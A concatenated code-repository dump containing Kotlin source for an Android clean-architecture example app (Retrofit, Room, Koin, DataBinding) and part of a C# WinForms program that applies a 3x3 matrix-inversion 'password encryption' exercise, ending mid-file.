setupRecyclerView(rvUsers)
}
private fun setupRecyclerView(recyclerView: RecyclerView) {
with(recyclerView) {
addDefaultConfiguration(activity)
adapter = mAdapter
}
}
}<file_sep>package com.example.template.remote.user
import com.example.template.remote.model.PostDto
import com.example.template.remote.model.UserDto
import retrofit2.Response
import retrofit2.http.GET
import retrofit2.http.Query
internal interface UserInterface {
@GET("/users")
suspend fun getUsers(): Response<List<UserDto>>
@GET("/posts")
suspend fun getPosts(@Query("userId") userId: Int): Response<List<PostDto>>
}<file_sep>package com.example.template.cache.tools
import androidx.lifecycle.LiveData
import androidx.room.*
import com.example.template.cache.tools.diffUtil.DiffCallback
import com.example.template.cache.tools.diffUtil.EntityDiffUtil
internal abstract class BaseDao<T> {
abstract fun getAllLiveItems(): LiveData<List<T>>
abstract fun getALlItems(): List<T>
abstract suspend fun clearTable()
@Insert(onConflict = OnConflictStrategy.REPLACE)
abstract suspend fun insert(item: T)
@Insert(onConflict = OnConflictStrategy.REPLACE)
abstract suspend fun insert(items: List<T>)
@Update
abstract suspend fun update(item: T)
@Update
abstract suspend fun update(items: List<T>)
@Delete
abstract suspend fun delete(item: T)
@Delete
abstract suspend fun delete(items: List<T>)
@Transaction
open suspend fun makeDiff(diffCallback: DiffCallback<T>) =
EntityDiffUtil(diffCallback).dispatchDiffUpdate(this)
}<file_sep>package com.example.template.remote
import okhttp3.Interceptor
import okhttp3.OkHttpClient
import okhttp3.logging.HttpLoggingInterceptor
internal object OkHttp {
fun getClient(vararg interceptor: Interceptor): OkHttpClient =
OkHttpClient.Builder().apply {
interceptor.forEach {
addInterceptor(it)
}
}.build()
fun getLogsInterceptor() =
HttpLoggingInterceptor().apply { level = HttpLoggingInterceptor.Level.BODY }
}
<file_sep>package com.example.template
import android.app.Application
import com.example.template.di.PresentationKoinModules
import org.koin.android.ext.koin.androidContext
import org.koin.core.context.startKoin
class MyApp : Application() {
override fun onCreate() {
super.onCreate()
DomainComponent.init(this)
startKoin {
androidContext(this@MyApp)
modules(
PresentationKoinModules.presentationModule
)
}
}
}<file_sep>package com.example.template.remote
sealed class Output<out T : Any> {
data class Success<out T : Any>(val data: T) : Output<T>()
data class Error(val errorEnum: ErrorEnum) : Output<Nothing>()
}
enum class ErrorEnum {
NOT_SUCCESSFULLY,
MAP_CAST_EXCEPTION
}<file_sep>package com.example.template.useCases
import androidx.lifecycle.LiveData
import androidx.lifecycle.liveData
import com.example.template.cache.user.UserCacheRepository
import com.example.template.model.User
import com.example.template.remote.Output
import com.example.template.remote.user.UserRemoteRepository
import kotlinx.coroutines.Dispatchers
interface UserUseCase {
fun getUsers(): LiveData<List<User>>
}
internal class UserUseCaseImpl(
private val remote: UserRemoteRepository,
private val cache: UserCacheRepository
) : UserUseCase, BaseUseCase() {
override fun getUsers() = liveData(Dispatchers.IO) {
emitSource(cache.getAllUsers())
val userOutput = remote.getUsers()
if(userOutput is Output.Success)
cache.saveUsers(userOutput.data)
}
}<file_sep>import Libraries.AndroidX
plugins {
id(BuildPlugins.androidLibrary)
id(BuildPlugins.kotlinAndroid)
id(BuildPlugins.kotlinAndroidExtensions)
id(BuildPlugins.kotlinKapt)
}
android {
compileSdkVersion(AndroidSdk.compile)
buildToolsVersion(BuildPlugins.buildToolsVersion)
defaultConfig {
minSdkVersion(AndroidSdk.min)
targetSdkVersion(AndroidSdk.target)
consumerProguardFiles("consumer-rules.pro")
}
buildTypes {
getByName("release") {
isMinifyEnabled = true
proguardFiles(
getDefaultProguardFile("proguard-android-optimize.txt"),
"consumer-rules.pro"
)
}
}
}
dependencies {
implementation(fileTree(mapOf("dir" to "libs", "include" to listOf("*.jar"))))
implementation(Libraries.kotlinStdLib)
implementation(AndroidX.appCompat)
implementation(AndroidX.ktxCore)
implementation(Libraries.timber)
implementation(AndroidX.room)
implementation(AndroidX.roomKtx)
kapt(AndroidX.roomKapt)
implementation(Libraries.moshi)
kapt(Libraries.moshiKapt)
implementation(Libraries.retrofit)
implementation(Libraries.retrofitCoroutines)
implementation(Libraries.retrofitMoshi)
implementation(Libraries.okhttp)
implementation(Libraries.okhttpInterceptor)
implementation(Libraries.koin)
testImplementation(TestLibraries.junit4)
androidTestImplementation(TestLibraries.junitTestExt)
androidTestImplementation(TestLibraries.espresso)
}<file_sep>package com.example.template.remote.model
import com.example.template.model.Post
internal data class PostDto(
val body: String,
val id: Int,
val title: String,
val userId: Int
)
internal fun PostDto.toPost() = Post(
id,
body,
title,
userId
)
internal fun List<PostDto>.toPosts() = map { it.toPost() }<file_sep>package com.example.template.cache.tools.diffUtil
import com.example.template.cache.tools.BaseDao
internal class EntityDiffUtil<T>(private val diffCallback: DiffCallback<T>) {
suspend fun dispatchDiffUpdate(dao: BaseDao<T>) {
val newEntryList = diffCallback.getNewItemList()
val oldEntryList = diffCallback.getOldItemList()
val (commonEntries, newEntries) = newEntryList.partition { newEntry ->
oldEntryList.any { diffCallback.areItemsTheSame(it, newEntry) }
}
val removedEntries = oldEntryList.filterNot { oldEntry ->
commonEntries.any { diffCallback.areItemsTheSame(oldEntry, it) }
}
dao.delete(removedEntries)
dao.update(commonEntries)
dao.insert(newEntries)
}
}<file_sep>package com.example.template.user
import androidx.databinding.ViewDataBinding
import androidx.databinding.library.baseAdapters.BR
import com.example.template.R
import com.example.template.model.User
import com.example.template.tools.base.BaseAdapter
import com.example.template.tools.base.ItemClickListener
class UserAdapter(private val mListener: ItemClickListener<User>) : BaseAdapter<User>() {
override fun getLayout() = R.layout.item_user
override fun bindingData(binding: ViewDataBinding, item: User) {
binding.setVariable(BR.User, item)
binding.setVariable(BR.Listener, mListener)
binding.executePendingBindings()
}
}<file_sep>package com.example.template.remote
import com.jakewharton.retrofit2.adapter.kotlin.coroutines.CoroutineCallAdapterFactory
import okhttp3.OkHttpClient
import retrofit2.Retrofit
import retrofit2.converter.moshi.MoshiConverterFactory
internal object Retrofit {
fun getClient(okHttpClient: OkHttpClient, baseUrl: String) : Retrofit = Retrofit.Builder()
.client(okHttpClient)
.baseUrl(baseUrl)
.addConverterFactory(MoshiConverterFactory.create())
.addCallAdapterFactory(CoroutineCallAdapterFactory())
.build()
}<file_sep>package com.example.template.model
import com.example.template.cache.model.PostEntity
import com.example.template.tools.BaseItem
data class Post(
override val id: Int,
val body: String,
val title: String,
val userId: Int
): BaseItem
internal fun Post.toEntity() = PostEntity(
id.toLong(),
body,
title,
userId
)
internal fun List<Post>.toEntities() = map { it.toEntity() }<file_sep>package com.example.template.posts
import android.os.Bundle
import android.view.View
import androidx.recyclerview.widget.RecyclerView
import com.example.template.R
import com.example.template.databinding.FragmentPostBinding
import com.example.template.tools.base.BaseBindableFragment
import com.example.template.tools.extensions.addDefaultConfiguration
import kotlinx.android.synthetic.main.fragment_post.*
import org.koin.android.viewmodel.ext.android.viewModel
import org.koin.core.parameter.parametersOf
class PostFragment : BaseBindableFragment<FragmentPostBinding>() {
private val mViewModel: PostViewModel by viewModel {
val userId = PostFragmentArgs.fromBundle(arguments).userId
parametersOf(userId)
}
private val mAdapter by lazy { PostAdapter() }
override fun getLayout() = R.layout.fragment_post
override fun bindingData(mBinding: FragmentPostBinding) {
mBinding.viewModel = mViewModel
}
override fun onViewCreated(view: View, savedInstanceState: Bundle?) {
super.onViewCreated(view, savedInstanceState)
setupRecyclerView(rvPosts)
}
private fun setupRecyclerView(recyclerView: RecyclerView) {
with(recyclerView) {
addDefaultConfiguration(activity)
adapter = mAdapter
}
}
}<file_sep>package com.example.template
import android.app.Application
object DomainComponent {
fun init(application: Application) {
DataComponent.init(application)
}
}<file_sep>package com.example.template.di
import org.koin.core.Koin
import org.koin.core.KoinComponent
import org.koin.dsl.koinApplication
abstract class DomainKoinComponent : KoinComponent {
private val domainKoin = koinApplication {
modules(DomainKoinModules.domainModules)
}
override fun getKoin(): Koin {
return domainKoin.koin
}
}<file_sep>package com.example.template.cache
import android.content.Context
import androidx.room.Room
const val DATABASE_NAME = "database_name"
internal object DatabaseClient {
@Volatile
private var INSTANCE: MyDatabase? = null
fun getInstance(context: Context): MyDatabase =
INSTANCE ?: synchronized(this) {
INSTANCE ?: buildDatabase(context).also { INSTANCE = it }
}
private fun buildDatabase(context: Context) =
Room.databaseBuilder(
context.applicationContext,
MyDatabase::class.java, DATABASE_NAME
)
.fallbackToDestructiveMigration()
.build()
}
<file_sep>package com.example.template.remote.model
import com.example.template.model.User
internal data class UserDto(
val address: AddressDto,
val company: CompanyDto,
val email: String,
val id: Int,
val name: String,
val phone: String,
val username: String,
val website: String
)
internal fun UserDto.toUser() = User(
id,
address.toAddress(),
company.toCompany(),
email,
name,
phone,
username,
website
)
internal fun List<UserDto>.toUsers() = map { it.toUser() }<file_sep>package com.example.template.tools.binding_adapter
import androidx.databinding.BindingAdapter
import androidx.recyclerview.widget.ListAdapter
import androidx.recyclerview.widget.RecyclerView
@BindingAdapter("data")
fun RecyclerView.data(items: List<Nothing>?) {
items ?: return
(adapter as? ListAdapter<*, *>)?.submitList(items)
}<file_sep>package com.example.template.model
import com.example.template.cache.model.CompanyEntity
data class Company(
val bs: String,
val catchPhrase: String,
val name: String
)
internal fun Company.toCompanyEntity() = CompanyEntity(
bs,
catchPhrase,
name
)<file_sep>package com.example.template.cache.model
import androidx.room.ColumnInfo
import androidx.room.Embedded
import androidx.room.Entity
import androidx.room.PrimaryKey
import com.example.template.cache.tools.BaseEntityItem
import com.example.template.model.User
@Entity(tableName = UserEntity.TABLE_NAME)
internal data class UserEntity(
@PrimaryKey
@ColumnInfo(name = COLUMN_ID)
override val id: Long,
@Embedded
val address: AddressEntity,
@Embedded(prefix = COMPANY_PREFIX)
val company: CompanyEntity,
val email: String,
val name: String,
val phone: String,
val username: String,
val website: String
): BaseEntityItem {
companion object {
const val TABLE_NAME = "table_user"
const val COLUMN_ID = "user_id"
const val COMPANY_PREFIX = "company_"
}
}
internal fun UserEntity.toUser() = User(
id.toInt(),
address.toAddress(),
company.toCompany(),
email,
name,
phone,
username,
website
)
internal fun List<UserEntity>.toUsers() = map { it.toUser() }<file_sep>import Libraries.AndroidX
import java.io.FileInputStream
import java.util.*
plugins {
id(BuildPlugins.androidApplication)
id(BuildPlugins.kotlinAndroid)
id(BuildPlugins.kotlinAndroidExtensions)
id(BuildPlugins.kotlinKapt)
id(BuildPlugins.safeArgsPlugin)
}
android {
compileSdkVersion(AndroidSdk.compile)
buildToolsVersion(BuildPlugins.buildToolsVersion)
defaultConfig {
applicationId = "com.example.template"
minSdkVersion(AndroidSdk.min)
targetSdkVersion(AndroidSdk.target)
versionCode = 1
versionName = "1.0"
testInstrumentationRunner = "androidx.test.runner.AndroidJUnitRunner"
dataBinding.isEnabled = true
}
sourceSets {
getByName("main").res.srcDirs(
"src/main/res",
"src/main/res/layouts/user",
"src/main/res/layouts/post"
)
}
signingConfigs {
val keystorePropertiesFile = rootProject.file("app/cert/keystore.properties")
val keystoreProperties = Properties()
keystoreProperties.load(FileInputStream(keystorePropertiesFile))
create("release") {
keyAlias = keystoreProperties["keyAlias"].toString()
keyPassword = keystoreProperties["keyPassword"].toString()
storeFile = file(keystoreProperties["storeFile"].toString())
storePassword = keystoreProperties["storePassword"].toString()
}
getByName("debug") {
storeFile = rootProject.file("app/cert/debug-key.jks")
storePassword = "<PASSWORD>"
keyAlias = "test123"
keyPassword = "<PASSWORD>"
}
}
buildTypes {
getByName("debug") {
signingConfig = signingConfigs.getByName("debug")
}
getByName("release") {
isMinifyEnabled = true
signingConfig = signingConfigs.getByName("release")
proguardFiles(
getDefaultProguardFile("proguard-android-optimize.txt"),
"proguard-rules.pro"
)
}
}
}
dependencies {
implementation(project(":domain"))
implementation(project(":data"))
implementation(AndroidX.appCompat)
implementation(AndroidX.ktxCore)
implementation(AndroidX.constraintLayout)
implementation(AndroidX.recyclerView)
implementation(AndroidX.lifecycleViewmodel)
implementation(Libraries.kotlinStdLib)
implementation(Libraries.material)
implementation(Libraries.timber)
implementation(Libraries.navigationUI)
implementation(Libraries.navigationFragment)
implementation(Libraries.koin)
implementation(Libraries.koinViewmodel)
testImplementation(TestLibraries.junit4)
androidTestImplementation(TestLibraries.junitTestExt)
androidTestImplementation(TestLibraries.espresso)
}<file_sep>package com.example.template.remote.model
import com.example.template.model.Geo
internal data class GeoDto(
val lat: String,
val lng: String
)
internal fun GeoDto.toGeo() = Geo(
lat,
lng
)<file_sep>package com.example.template.tools
interface BaseItem {
val id: Int
}<file_sep>package com.example.template.remote.user
import com.example.template.remote.model.PostDto
import com.example.template.remote.model.UserDto
import retrofit2.Response
internal interface UserService {
suspend fun getPosts(userId: Int): Response<List<PostDto>>
suspend fun getUsers(): Response<List<UserDto>>
}
internal class UserServiceImpl(private val userInterface: UserInterface) :
UserService {
override suspend fun getPosts(userId: Int) = userInterface.getPosts(userId)
override suspend fun getUsers() = userInterface.getUsers()
}
internal class UserMockServiceImpl() : UserService {
override suspend fun getPosts(userId: Int): Response<List<PostDto>> =
Response.success(listOf(PostDto("body", 0, "title", 0)))
override suspend fun getUsers(): Response<List<UserDto>> =
Response.success(emptyList())
}<file_sep>package com.example.template.cache.tools
internal interface BaseEntityItem {
val id: Long
}<file_sep># Android Example Project
Example code with use of Clean Architecture and popular libraries like Retrofit, DataBinding, LiveData, Coroutines etc.<file_sep>package com.example.template.tools.base
interface ItemClickListener<T> {
fun onItemClicked(item: T)
}<file_sep>package com.example.template.remote
import com.example.template.remote.user.UserInterface
import okhttp3.OkHttpClient
internal object ApiUtils {
private const val URL_TO_API = "https://jsonplaceholder.typicode.com"
fun getUserInterface(okHttpClient: OkHttpClient): UserInterface =
Retrofit.getClient(okHttpClient, URL_TO_API)
.create(UserInterface::class.java)
}<file_sep>package com.example.template.posts
import androidx.databinding.ViewDataBinding
import androidx.databinding.library.baseAdapters.BR
import com.example.template.R
import com.example.template.model.Post
import com.example.template.tools.base.BaseAdapter
class PostAdapter: BaseAdapter<Post>() {
override fun getLayout() = R.layout.item_post
override fun bindingData(binding: ViewDataBinding, item: Post) {
binding.setVariable(BR.Post, item)
binding.executePendingBindings()
}
}<file_sep>package com.example.template.tools.base
import android.os.Bundle
import android.view.LayoutInflater
import android.view.View
import android.view.ViewGroup
import androidx.annotation.LayoutRes
import androidx.databinding.DataBindingUtil
import androidx.databinding.ViewDataBinding
import androidx.fragment.app.Fragment
abstract class BaseBindableFragment<T : ViewDataBinding> : Fragment() {
private lateinit var mBinding: T
override fun onCreateView(
inflater: LayoutInflater,
container: ViewGroup?,
savedInstanceState: Bundle?
): View? {
mBinding = DataBindingUtil.inflate(inflater, getLayout(), container, false)
mBinding.lifecycleOwner = this
return mBinding.root
}
@LayoutRes
abstract fun getLayout(): Int
override fun onViewCreated(view: View, savedInstanceState: Bundle?) {
super.onViewCreated(view, savedInstanceState)
bindingData(mBinding)
}
abstract fun bindingData(mBinding: T)
}<file_sep>package com.example.template
import com.example.template.di.DomainKoinComponent
import com.example.template.useCases.PostUseCase
import com.example.template.useCases.UserUseCase
import org.koin.core.inject
object DomainFactory : DomainKoinComponent() {
val userUseCase: UserUseCase by inject()
val postUseCase: PostUseCase by inject()
}
|
416dfd5823052b61be504b57dd265c43e378b0cb
|
[
"Markdown",
"Kotlin"
] | 64 |
Kotlin
|
krzysztofkurowski/Android-Example-Project
|
505ba8a2a6dac5766da71a3f5005868003276bec
|
9e5ac3f740c74835ea35a23b48f88bdf9bf4ba44
|
refs/heads/main
|
<file_sep>//
// main.swift
// Lesson7
//
// Created by Pauwell on 24.03.2021.
//
import Foundation
print("Hello, World!")
|
747a9fe20d377a769b2b7faab1ff820a83f52a1c
|
[
"Swift"
] | 1 |
Swift
|
Pauwell86/Lesson7
|
a0aa2f8623baa0c12914575b74f9995e25c8beec
|
46d68661f67749fab5d37db53db2c01b53c3a893
|
refs/heads/master
|
<file_sep>using System;
using System.Windows.Forms;
namespace MathSharp
{
public partial class frmPrincipal : Form
{
public frmPrincipal()
{
InitializeComponent();
}
private void btnOrdemDois_Click(object sender, EventArgs e)
{
frmOrdemDois OrdemDois = new frmOrdemDois();
OrdemDois.Show();
this.Hide();
}
private void btnOrdemTres_Click(object sender, EventArgs e)
{
frmOrdemTrês OrdemTres = new frmOrdemTrês();
OrdemTres.Show();
this.Hide();
}
private void frmPrincipal_FormClosed(object sender, FormClosedEventArgs e)
{
Application.Exit();
}
}
}
<file_sep>using System;
using System.Linq;
using System.Windows.Forms;
namespace MathSharp
{
public partial class frmOrdemTrês : Form
{
public frmOrdemTrês()
{
InitializeComponent();
}
public static float[,] Senha_Comum; // MATRIZ SENHA (informada pelo usuário)
public static float Determinante_Comum; // Determinante da MATRIZ SENHA
public static float[,] Senha_Criptografia; // MATRIZ CRIPTOGRAFIA MATRIZ CRIPTOGRAFIA (matriz auxiliar formada pela multiplicação dos elementos da MATRIZ SENHA)
public static float[,] Senha_Mestre; // MATRIZ MESTRE (multiplicação entre a MATRIZ SENHA x CRIPTOGRAFIA)
public static float Determinante_Criptografia; // Determinante da MATRIZ CRIPTOGRAFIA
public static float[,] Senha_Transposta; // MATRIZ TRANSPOSTA (transposta da MATRIZ CRIPTOGRAFIA)
public static float[,] Senha_Cofatora; // MATRIZ COFATORA (matriz adjunta formada a partir dos elementos da MATRIZ TRANSPOSTA)
public static float[,] Senha_Inversa; // MATRIZ INVERSA (matriz resultante da multiplicação entre MATRIZ COFATORA x 1 / DETERMINANTE CRIPTOGRAFIA
public static float[,] Senha_Descriptografia; // MATRIZ DESCRIPTOGRAFIA (multiplicação da MATRIZ MESTRE x MATRIZ INVERSA = MATRIZ SENHA)
private void frmOrdemTres_FormClosed(object sender, FormClosedEventArgs e)
{
frmPrincipal Principal = new frmPrincipal();
Principal.Show();
this.Hide();
}
private void btnCriptografar_Click(object sender, EventArgs e)
{
try
{
// MATRIZ SENHA: uma matriz de ordem três, na qual o usuário deve informar seus valores.
// Esta matriz tem apenas como regra o limite de seus elementos, limitada a números inteiros positivos não superiores a 9999.
float[,] Senha = { { 0, 0, 0 }, { 0, 0, 0 }, { 0, 0, 0 } };
for (int l = 0; l <= 2; l++)
{
for (int c = 0; c <= 2; c++)
{
String Nome = "txtSenha" + l + "x" + c;
TextBox txtSenha = this.Controls.Find(Nome, true).FirstOrDefault() as TextBox;
Senha[l, c] = float.Parse(txtSenha.Text);
}
}
Senha_Comum = Senha;
// Determinante da MATRIZ SENHA (se o determinante for igual a 0, por definição sua inversa é inexistente)
float Det_PC, Det_NC, Det_Comum;
// Sentido da Esquerda para Direita
Det_PC = +(Senha_Comum[0, 0] * Senha_Comum[1, 1] * Senha_Comum[2, 2]) + (Senha_Comum[0, 1] * Senha_Comum[1, 2] * Senha_Comum[2, 0]) + (Senha_Comum[0, 2] * Senha_Comum[1, 0] * Senha_Comum[2, 1]);
// Sentido da Direita para Esquerda
Det_NC = -(Senha_Comum[0, 2] * Senha_Comum[1, 1] * Senha_Comum[2, 0]) - (Senha_Comum[0, 0] * Senha_Comum[1, 2] * Senha_Comum[2, 1]) - (Senha_Comum[0, 1] * Senha_Comum[1, 0] * Senha_Comum[2, 2]);
Det_Comum = Det_PC + Det_NC;
Determinante_Comum = Det_Comum;
if (Determinante_Comum == 0)
{
MessageBox.Show("Não foi possível criptografar a senha.\nA matriz senha tem zero como determinante.", "Aviso", MessageBoxButtons.OK, MessageBoxIcon.Exclamation);
Zerar_Tudo();
}
else
{
// MATRIZ CRIPTOGRAFIA: é uma matriz auxiliar que será multiplicada pela MATRIZ COMUM.
// Esta matriz é formada por meio de uma multiplicação (baseada na regra abaixo) com os elementos da MATRIZ SENHA:
// - [Senha(L0C0) x 73] (73 em decimal = I)
// - [Senha(L0C1) x 70] (70 em decimal = F)
// - [Senha(L0C2) x 72] (72 em decimal = H)
// - [Senha(L1C0) x 84] (84 em decimal = T)
// - [Senha(L1C1) x 65] (65 em decimal = A)
// - [Senha(L1C2) x 68] (68 em decimal = D)
// - [Senha(L2C0) x 83] (83 em decimal = S)
// - [Senha(L2C1) x 1]
// - [Senha(L2C2) x 7]
float[,] Criptografia = { // Coluna 1 // Coluna 2 // Coluna 3
{ Senha_Comum[0,0] * 73 , Senha_Comum[0,1] * 70 , Senha_Comum[0,2] * 72 } , // Linha 1
{ Senha_Comum[1,0] * 84 , Senha_Comum[1,1] * 65 , Senha_Comum[1,2] * 68 } , // Linha 2
{ Senha_Comum[2,0] * 83 , Senha_Comum[2,1] * 01 , Senha_Comum[2,2] * 07 } // Linha 3
};
Senha_Criptografia = Criptografia;
txtSenhaCriptografia.Text = Senha_Criptografia[0, 0].ToString() + " " + Senha_Criptografia[0, 1].ToString() + " " + Senha_Criptografia[0, 2].ToString() +
" " + Senha_Criptografia[1, 0].ToString() + " " + Senha_Criptografia[1, 1].ToString() + " " + Senha_Criptografia[1, 2].ToString() +
" " + Senha_Criptografia[2, 0].ToString() + " " + Senha_Criptografia[2, 1].ToString() + " " + Senha_Criptografia[2, 2].ToString();
// Determinante da MATRIZ CRIPTOGRAFIA (se o determinante for igual a 0, por definição sua inversa é inexistente)
float Det_PM, Det_NM, Det_Criptografia;
// Sentido da Esquerda para Direita
Det_PM = +(Senha_Criptografia[0, 0] * Senha_Criptografia[1, 1] * Senha_Criptografia[2, 2]) + (Senha_Criptografia[0, 1] * Senha_Criptografia[1, 2] * Senha_Criptografia[2, 0]) + (Senha_Criptografia[0, 2] * Senha_Criptografia[1, 0] * Senha_Criptografia[2, 1]);
// Sentido da Direita para Esquerda
Det_NM = -(Senha_Criptografia[0, 2] * Senha_Criptografia[1, 1] * Senha_Criptografia[2, 0]) - (Senha_Criptografia[0, 0] * Senha_Criptografia[1, 2] * Senha_Criptografia[2, 1]) - (Senha_Criptografia[0, 1] * Senha_Criptografia[1, 0] * Senha_Criptografia[2, 2]);
Det_Criptografia = Det_PM + Det_NM;
Determinante_Criptografia = Det_Criptografia;
if (Determinante_Criptografia == 0)
{
MessageBox.Show("Não foi possível criptografar a senha.\nA matriz criptografia tem zero como determinante.", "Aviso", MessageBoxButtons.OK, MessageBoxIcon.Exclamation);
Zerar_Tudo();
}
else
{
// MATRIZ MESTRE: é uma matriz gerada a partir da multiplicação da MATRIZ CRIPTOGRAFIA com a MATRIZ COMUM.
float[] Elementos =
{
// Linha 1
(Senha_Comum[0,0] * Senha_Criptografia[0,0]) + (Senha_Comum[0,1] * Senha_Criptografia[1,0]) + (Senha_Comum[0,2] * Senha_Criptografia[2,0]) , // Coluna 1
(Senha_Comum[0,0] * Senha_Criptografia[0,1]) + (Senha_Comum[0,1] * Senha_Criptografia[1,1]) + (Senha_Comum[0,2] * Senha_Criptografia[2,1]) , // Coluna 2
(Senha_Comum[0,0] * Senha_Criptografia[0,2]) + (Senha_Comum[0,1] * Senha_Criptografia[1,2]) + (Senha_Comum[0,2] * Senha_Criptografia[2,2]) , // Coluna 3
// Linha 2
(Senha_Comum[1,0] * Senha_Criptografia[0,0]) + (Senha_Comum[1,1] * Senha_Criptografia[1,0]) + (Senha_Comum[1,2] * Senha_Criptografia[2,0]) , // Coluna 1
(Senha_Comum[1,0] * Senha_Criptografia[0,1]) + (Senha_Comum[1,1] * Senha_Criptografia[1,1]) + (Senha_Comum[1,2] * Senha_Criptografia[2,1]) , // Coluna 2
(Senha_Comum[1,0] * Senha_Criptografia[0,2]) + (Senha_Comum[1,1] * Senha_Criptografia[1,2]) + (Senha_Comum[1,2] * Senha_Criptografia[2,2]) , // Coluna 3
// Linha 3
(Senha_Comum[2,0] * Senha_Criptografia[0,0]) + (Senha_Comum[2,1] * Senha_Criptografia[1,0]) + (Senha_Comum[2,2] * Senha_Criptografia[2,0]) , // Coluna 1
(Senha_Comum[2,0] * Senha_Criptografia[0,1]) + (Senha_Comum[2,1] * Senha_Criptografia[1,1]) + (Senha_Comum[2,2] * Senha_Criptografia[2,1]) , // Coluna 2
(Senha_Comum[2,0] * Senha_Criptografia[0,2]) + (Senha_Comum[2,1] * Senha_Criptografia[1,2]) + (Senha_Comum[2,2] * Senha_Criptografia[2,2]) // Coluna 3
};
float[,] Mestre =
{
// Coluna 1 // Coluna 2 // Coluna 3
{ Elementos[0], Elementos[1], Elementos[2] } , // Linha 1
{ Elementos[3], Elementos[4], Elementos[5] } , // Linha 2
{ Elementos[6], Elementos[7], Elementos[8] } // Linha 3
};
Senha_Mestre = Mestre;
txtSenhaMestre.Text = Senha_Mestre[0, 0].ToString() + " " + Senha_Mestre[0, 1].ToString() + " " + Senha_Mestre[0, 2].ToString() +
" " + Senha_Mestre[1, 0].ToString() + " " + Senha_Mestre[1, 1].ToString() + " " + Senha_Mestre[1, 2].ToString() +
" " + Senha_Mestre[2, 0].ToString() + " " + Senha_Mestre[2, 1].ToString() + " " + Senha_Mestre[2, 2].ToString();
// MATRIZ TRANSPOSTA: é a matriz transposta da MATRIZ CRIPTOGRAFIA
float[,] Transposta =
{
// Coluna 1 // Coluna 2 // Coluna 3
{ Senha_Criptografia[0,0] , Senha_Criptografia[1,0] , Senha_Criptografia[2,0] } , // Linha 1
{ Senha_Criptografia[0,1] , Senha_Criptografia[1,1] , Senha_Criptografia[2,1] } , // Linha 2
{ Senha_Criptografia[0,2] , Senha_Criptografia[1,2] , Senha_Criptografia[2,2] } // Linha 3
};
Senha_Transposta = Transposta;
txtSenhaTransposta.Text = Senha_Transposta[0, 0].ToString() + " " + Senha_Transposta[0, 1].ToString() + " " + Senha_Transposta[0, 2].ToString() +
" " + Senha_Transposta[1, 0].ToString() + " " + Senha_Transposta[1, 1].ToString() + " " + Senha_Transposta[1, 2].ToString() +
" " + Senha_Transposta[2, 0].ToString() + " " + Senha_Transposta[2, 1].ToString() + " " + Senha_Transposta[2, 2].ToString();
// ZERAR CAMPOS: caso já houver números nos campos remanescentes, os mesmos serão zerados
Zerar_Parcial();
btnCofatorar.Enabled = true;
btnCofatorar.Focus();
}
}
}
catch
{
MessageBox.Show("Dados inválidos, favor digitar novamente.", "Aviso", MessageBoxButtons.OK, MessageBoxIcon.Error);
Zerar_Tudo();
}
}
private void btnCofatorar_Click(object sender, EventArgs e)
{
// MATRIZ COFATORA: é a matriz adjunta gerada pelos elementos cofatores da MATRIZ TRANSPOSTA
float[] Determinantes_Cofatora =
{
// Linha 1
+ 1 * ((Senha_Transposta[1,1] * Senha_Transposta[2,2]) - (Senha_Transposta[2,1] * Senha_Transposta[1,2])) , // Coluna 1
- 1 * ((Senha_Transposta[1,0] * Senha_Transposta[2,2]) - (Senha_Transposta[2,0] * Senha_Transposta[1,2])) , // Coluna 2
+ 1 * ((Senha_Transposta[1,0] * Senha_Transposta[2,1]) - (Senha_Transposta[2,0] * Senha_Transposta[1,1])) , // Coluna 3
// Linha 2
- 1 * ((Senha_Transposta[0,1] * Senha_Transposta[2,2]) - (Senha_Transposta[2,1] * Senha_Transposta[0,2])) , // Coluna 1
+ 1 * ((Senha_Transposta[0,0] * Senha_Transposta[2,2]) - (Senha_Transposta[2,0] * Senha_Transposta[0,2])) , // Coluna 2
- 1 * ((Senha_Transposta[0,0] * Senha_Transposta[2,1]) - (Senha_Transposta[2,0] * Senha_Transposta[0,1])) , // Coluna 3
// Linha 3
+ 1 * ((Senha_Transposta[0,1] * Senha_Transposta[1,2]) - (Senha_Transposta[1,1] * Senha_Transposta[0,2])) , // Coluna 1
- 1 * ((Senha_Transposta[0,0] * Senha_Transposta[1,2]) - (Senha_Transposta[1,0] * Senha_Transposta[0,2])) , // Coluna 2
+ 1 * ((Senha_Transposta[0,0] * Senha_Transposta[1,1]) - (Senha_Transposta[1,0] * Senha_Transposta[0,1])) , // Coluna 3
};
float[,] Cofatora =
{
// Coluna 1 // Coluna 2 // Coluna 3
{ Determinantes_Cofatora[0] , Determinantes_Cofatora[1] , Determinantes_Cofatora[2] } , // Linha 1
{ Determinantes_Cofatora[3] , Determinantes_Cofatora[4] , Determinantes_Cofatora[5] } , // Linha 2
{ Determinantes_Cofatora[6] , Determinantes_Cofatora[7] , Determinantes_Cofatora[8] } // Linha 3
};
Senha_Cofatora = Cofatora;
txtSenhaCofatora.Text = Senha_Cofatora[0, 0].ToString() + " " + Senha_Cofatora[0, 1].ToString() + " " + Senha_Cofatora[0, 2].ToString() +
" " + Senha_Cofatora[1, 0].ToString() + " " + Senha_Cofatora[1, 1].ToString() + " " + Senha_Cofatora[1, 2].ToString() +
" " + Senha_Cofatora[2, 0].ToString() + " " + Senha_Cofatora[2, 1].ToString() + " " + Senha_Cofatora[2, 2].ToString();
btnDescriptografar.Enabled = true;
btnDescriptografar.Focus();
}
private void btnDescriptografar_Click(object sender, EventArgs e)
{
// MATRIZ INVERSA: é a matriz resultante da multiplicação entre a MATRIZ COFATORA x 1 / Det(MATRIZ CRIPTOGRAFIA)
float[,] Inversa =
{
// Coluna 1 // Coluna 2 // Coluna 3
{ (Senha_Cofatora[0,0] / Determinante_Criptografia) , (Senha_Cofatora[0,1] / Determinante_Criptografia) , (Senha_Cofatora[0,2] / Determinante_Criptografia) } , // Linha 1
{ (Senha_Cofatora[1,0] / Determinante_Criptografia) , (Senha_Cofatora[1,1] / Determinante_Criptografia) , (Senha_Cofatora[1,2] / Determinante_Criptografia) } , // Linha 2
{ (Senha_Cofatora[2,0] / Determinante_Criptografia) , (Senha_Cofatora[2,1] / Determinante_Criptografia) , (Senha_Cofatora[2,2] / Determinante_Criptografia) } // Linha 3
};
Senha_Inversa = Inversa;
txtSenhaInversa.Text = Senha_Inversa[0, 0].ToString() + " " + Senha_Inversa[0, 1].ToString() + " " + Senha_Inversa[0, 2].ToString() +
" " + Senha_Inversa[1, 0].ToString() + " " + Senha_Inversa[1, 1].ToString() + " " + Senha_Inversa[1, 2].ToString() +
